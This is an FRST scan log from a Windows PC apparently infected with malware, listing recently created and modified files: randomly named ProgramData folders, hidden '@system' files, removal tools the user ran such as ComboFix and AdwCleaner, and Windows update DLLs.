2014-11-09 10:13 - 2014-11-09 10:13 - 00000000 ____D () C:\Users\Jack\Downloads\FRST-OlderVersion
2014-11-09 02:33 - 2014-11-09 02:33 - 00000000 ____D () C:\ProgramData\PawjIcin
2014-11-09 02:33 - 2014-11-09 02:33 - 00000000 ____D () C:\ProgramData\KatmaTtena
2014-11-08 21:14 - 2014-11-08 21:14 - 00000000 ____D () C:\ProgramData\NusepBarun
2014-11-08 21:14 - 2014-11-08 21:14 - 00000000 ____D () C:\ProgramData\NadeFyucj
2014-11-08 21:11 - 2014-11-09 10:08 - 00000000 ____D () C:\AdwCleaner
2014-11-08 21:09 - 2014-11-08 21:09 - 02145792 _____ () C:\Users\Jack\Desktop\AdwCleaner.exe
2014-11-08 20:56 - 2014-11-08 20:56 - 00000000 ____D () C:\ProgramData\WasaZritg
2014-11-08 20:56 - 2014-11-08 20:56 - 00000000 ____D () C:\ProgramData\BiguZwoy
2014-11-08 18:19 - 2014-11-08 18:19 - 00000750 _____ () C:\Users\Jack\Desktop\Start Emsisoft Emergency Kit.lnk
2014-11-08 18:18 - 2014-11-08 18:20 - 00000000 ____D () C:\EEK
2014-11-08 18:17 - 2014-11-08 18:18 - 155812376 _____ () C:\Users\Jack\Downloads\EmsisoftEmergencyKit.exe
2014-11-08 16:26 - 2014-11-08 16:26 - 00050867 _____ () C:\ComboFix.txt
2014-11-08 15:34 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-11-08 15:34 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-11-08 15:34 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-11-08 15:34 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-11-08 15:34 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-11-08 15:34 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-11-08 15:34 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-11-08 15:34 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-11-08 15:33 - 2014-11-08 16:27 - 00000000 ____D () C:\Qoobox
2014-11-08 15:33 - 2014-11-08 16:24 - 00000000 ____D () C:\Windows\erdnt
2014-11-08 15:31 - 2014-11-08 15:31 - 05593178 ____R (Swearware) C:\Users\Jack\Downloads\ComboFix.exe
2014-11-08 12:44 - 2014-11-08 12:45 - 00026570 _____ () C:\Users\Jack\Downloads\Addition.txt
2014-11-08 12:43 - 2014-11-09 10:13 - 00001407 _____ () C:\Users\Jack\Downloads\FRST.txt
2014-11-08 12:43 - 2014-11-08 12:44 - 00000000 ____D () C:\Users\Jack\Downloads\CLEANUP
2014-11-08 12:42 - 2014-11-09 10:13 - 01107456 _____ (Farbar) C:\Users\Jack\Downloads\FRST.exe
2014-11-08 12:42 - 2014-11-09 10:13 - 00000000 ____D () C:\FRST
2014-11-07 21:02 - 2014-11-07 21:02 - 00000000 ____D () C:\ProgramData\UehaLwahi
2014-11-07 21:02 - 2014-11-07 21:02 - 00000000 ____D () C:\ProgramData\NeseVdol
2014-11-07 01:50 - 2014-11-07 01:50 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\2E8A529B.sys
2014-11-05 16:37 - 2014-11-08 20:55 - 00000000 ____D () C:\ProgramData\VenqIxjeh
2014-11-05 16:36 - 2014-11-08 20:55 - 00000000 ____D () C:\ProgramData\KupoqIkavk
2014-11-05 02:34 - 2014-11-05 10:32 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Ismyihci
2014-11-05 02:33 - 2014-11-07 01:53 - 00000000 ____D () C:\ProgramData\LukucOkjav
2014-11-05 02:33 - 2014-11-07 01:53 - 00000000 ____D () C:\ProgramData\CimhAyoj
2014-11-03 23:05 - 2014-11-05 10:32 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Waanypi
2014-11-03 23:04 - 2014-11-03 23:04 - 00000000 ____D () C:\ProgramData\FunhEmnol
2014-11-03 23:03 - 2014-11-03 23:03 - 00000144 _____ () C:\Windows\system32\1
2014-11-03 23:03 - 2014-11-03 23:03 - 00000000 ____D () C:\ProgramData\ZixvOfbax
2014-11-01 22:16 - 2014-11-09 10:10 - 00000336 _____ () C:\Windows\setupact.log
2014-11-01 22:16 - 2014-11-09 10:09 - 00007030 _____ () C:\Windows\PFRO.log
2014-11-01 22:16 - 2014-11-01 22:16 - 00000000 _____ () C:\Windows\setuperr.log
2014-11-01 21:08 - 2014-11-09 10:13 - 00191619 _____ () C:\Windows\WindowsUpdate.log
2014-11-01 01:16 - 2014-11-01 22:15 - 00000000 ____D () C:\ProgramData\MuztOnba
2014-11-01 01:15 - 2014-11-01 22:15 - 00000000 ____D () C:\ProgramData\UabcIzedk
2014-10-31 22:46 - 2014-11-09 09:23 - 00000160 ____H () C:\ProgramData\@system3.att
2014-10-31 22:46 - 2014-11-09 09:22 - 00000424 _____ () C:\ProgramData\@system.temp
2014-10-31 22:45 - 2014-11-08 20:57 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\FrameworkUpdate7
2014-10-31 22:45 - 2014-11-02 01:10 - 00000000 ____D () C:\b11f30c
2014-10-31 22:45 - 2014-10-31 22:45 - 00000448 ____H () C:\Users\Jack\AppData\Roaming\麽鎒駓覜
2014-10-30 21:12 - 2014-10-30 21:12 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-10-30 20:21 - 2014-10-30 20:12 - 00688992 ____R (Swearware) C:\Users\Jack\Desktop\dds.com
2014-10-30 20:18 - 2014-10-30 20:25 - 00000770 _____ () C:\Users\Jack\Desktop\attach.txt
2014-10-30 20:12 - 2014-10-30 20:12 - 00688992 ____R (Swearware) C:\Users\Jack\Downloads\dds.com
2014-10-30 19:31 - 2014-10-30 21:16 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-10-30 19:23 - 2014-10-30 19:23 - 00001482 _____ () C:\Users\Jack\Desktop\MBAM 10-30.txt
2014-10-30 19:07 - 2014-10-30 20:00 - 00000000 ____D () C:\Users\Jack\Desktop\mbar
2014-10-29 08:01 - 2014-10-29 08:01 - 00000000 ____D () C:\Windows\Microsoft Antimalware
2014-10-27 02:04 - 2014-06-26 20:45 - 02285056 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2014-10-26 18:01 - 2014-10-29 09:02 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Tyfyukbe
2014-10-26 04:12 - 2014-02-03 21:04 - 01230336 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2014-10-26 04:10 - 2013-11-23 13:26 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll
2014-10-26 04:08 - 2014-09-18 19:44 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-26 04:08 - 2014-06-23 21:59 - 01987584 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2014-10-26 04:08 - 2013-11-26 03:16 - 03419136 _____ (Microsoft Corporation) C:\Windows\system32\d2d1.dll
2014-10-25 21:27 - 2014-10-25 21:33 - 00018973 _____ () C:\Users\Jack\Downloads\Result.txt
2014-10-25 21:17 - 2014-10-25 21:18 - 00002880 _____ () C:\Users\Jack\Downloads\FSS.txt
2014-10-25 20:48 - 2014-10-25 20:48 - 00854448 _____ () C:\Users\Jack\Desktop\SecurityCheck.exe
2014-10-25 12:45 - 2014-10-25 12:45 - 00000000 __SHD () C:\Users\Jack\AppData\Local\EmieUserList
2014-10-25 12:45 - 2014-10-25 12:45 - 00000000 __SHD () C:\Users\Jack\AppData\Local\EmieSiteList
2014-10-25 12:32 - 2014-10-25 12:32 - 00000440 _____ () C:\Users\Jack\Documents\fixlist.txt
2014-10-25 12:17 - 2014-10-25 12:17 - 00000632 _____ () C:\Users\Jack\Desktop\JRT.txt
2014-10-25 11:49 - 2014-10-25 11:49 - 00000000 ____D () C:\Windows\ERUNT
2014-10-25 08:10 - 2014-10-25 08:10 - 17484800 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 11807232 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 04201472 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-25 08:10 - 2014-10-25 08:10 - 02187264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 02017280 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-25 08:10 - 2014-10-25 08:10 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00677888 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00645120 _____ (Microsoft Corporation) C:\Windows\system32\jsIntl.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00616104 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dat
2014-10-25 08:10 - 2014-10-25 08:10 - 00610304 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00337408 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2014-10-25 08:10 - 2014-10-25 08:10 - 00331448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00233472 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00208384 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00194048 _____ (Microsoft Corporation) C:\Windows\system32\elshyph.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00182272 _____ (Microsoft Corporation) C:\Windows\system32\msls31.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00151552 _____ (Microsoft Corporation) C:\Windows\system32\iexpress.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\wextract.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00127488 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00116736 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\IEAdvpack.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00083456 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00074240 _____ (Microsoft Corporation) C:\Windows\system32\SetIEInstalledDate.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00071680 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00069120 _____ (Microsoft Corporation) C:\Windows\system32\icardie.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2014-10-25 08:10 - 2014-10-25 08:10 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\pngfilt.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\mshtmler.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00036352 _____ (Microsoft Corporation) C:\Windows\system32\imgutil.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\licmgr10.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 01247744 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 01158144 _____ (Microsoft Corporation) C:\Windows\system32\XpsPrint.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 01080832 _____ (Microsoft Corporation) C:\Windows\system32\d3d10.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00906240 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00604160 _____ (Microsoft Corporation) C:\Windows\system32\d3d10level9.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00364544 _____ (Microsoft Corporation) C:\Windows\system32\XpsGdiConverter.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00293376 _____ (Microsoft Corporation) C:\Windows\system32\dxgi.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00249856 _____ (Microsoft Corporation) C:\Windows\system32\d3d10_1core.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00220160 _____ (Microsoft Corporation) C:\Windows\system32\d3d10core.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00207872 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecsExt.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00187392 _____ (Microsoft Corporation) C:\Windows\system32\UIAnimation.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00161792 _____ (Microsoft Corporation) C:\Windows\system32\d3d10_1.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00010752 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00009728 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00005632 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00005632 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00002560 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
2014-10-25 06:54 - 2014-10-25 06:54 - 00017344 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-10-25 06:54 - 2014-10-25 06:54 - 00001057 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-10-25 06:54 - 2014-10-25 06:54 - 00001045 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-10-25 06:54 - 2014-10-25 06:54 - 00000318 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-10-25 06:54 - 2014-10-25 06:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-10-25 06:53 - 2014-11-06 22:25 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-10-25 06:53 - 2014-10-25 06:53 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\GlarySoft
2014-10-25 06:53 - 2014-10-25 06:53 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\DiskDefrag
2014-10-18 15:16 - 2014-10-18 15:16 - 00000464 __RSH () C:\ProgramData\ntuser.pol
2014-10-15 02:33 - 2014-10-09 20:44 - 00396288 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-15 02:33 - 2014-10-09 20:44 - 00230912 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-15 02:33 - 2014-10-09 20:39 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-15 02:33 - 2014-09-28 19:41 - 02379264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-15 02:32 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-15 02:32 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-15 02:32 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-15 02:32 - 2014-08-18 21:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-15 02:32 - 2014-08-18 21:41 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-15 02:32 - 2014-08-18 21:41 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-15 02:32 - 2014-08-18 21:40 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-15 02:32 - 2014-08-18 21:40 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-15 02:32 - 2014-08-18 20:48 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-15 02:32 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-15 02:32 - 2014-07-16 20:39 - 00523264 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 00304128 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-15 02:32 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-15 02:32 - 2014-07-16 20:03 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-15 02:32 - 2014-07-16 20:02 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-15 02:32 - 2014-07-08 20:29 - 00006144 _____ (Microsoft Corporation) C:\Windows\system32\KBDYAK.DLL
2014-10-15 02:32 - 2014-07-08 20:29 - 00006144 _____ (Microsoft Corporation) C:\Windows\system32\KBDTAT.DLL
2014-10-15 02:32 - 2014-07-08 20:29 - 00006144 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU1.DLL
2014-10-15 02:32 - 2014-07-08 20:29 - 00006144 _____ (Microsoft Corporation) C:\Windows\system32\KBDBASH.DLL
2014-10-15 02:32 - 2014-07-08 20:29 - 00005632 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU.DLL
2014-10-15 02:32 - 2014-07-08 17:30 - 00419992 _____ () C:\Windows\system32\locale.nls
2014-10-15 02:32 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00473600 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00275968 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00157184 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-15 02:32 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-15 02:32 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-15 02:32 - 2014-07-06 20:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2014-10-15 02:32 - 2014-07-06 20:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-15 02:32 - 2014-07-06 20:39 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-15 02:32 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-15 02:32 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-15 02:32 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-15 02:32 - 2014-07-06 20:28 - 00593920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-15 02:32 - 2014-06-27 19:21 - 00521384 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-15 02:32 - 2014-06-27 19:21 - 00455752 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-15 02:32 - 2014-06-27 19:21 - 00409272 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-15 02:32 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-15 02:32 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-15 02:32 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-11-09 10:10 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-09 09:40 - 2013-11-25 22:47 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-08 21:34 - 2009-07-13 23:34 - 00031904 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-08 21:34 - 2009-07-13 23:34 - 00031904 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-08 21:30 - 2010-11-20 16:01 - 00781298 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-08 16:26 - 2009-07-13 21:37 - 00000000 __RHD () C:\Users\Default
2014-11-08 16:26 - 2009-07-13 21:37 - 00000000 ___RD () C:\Users\Public
2014-11-08 16:22 - 2009-07-13 21:04 - 00000215 _____ () C:\Windows\system.ini
2014-11-07 01:50 - 2014-04-06 08:16 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-11-02 01:22 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-30 19:30 - 2014-04-06 08:13 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-30 06:24 - 2013-11-25 11:49 - 00229000 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-27 04:55 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Globalization
2014-10-25 22:10 - 2010-11-20 19:38 - 00000000 ____D () C:\Windows\DigitalLocker
2014-10-25 15:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\rescache
2014-10-25 12:39 - 2011-06-02 16:34 - 00000000 ____D () C:\Windows\Panther
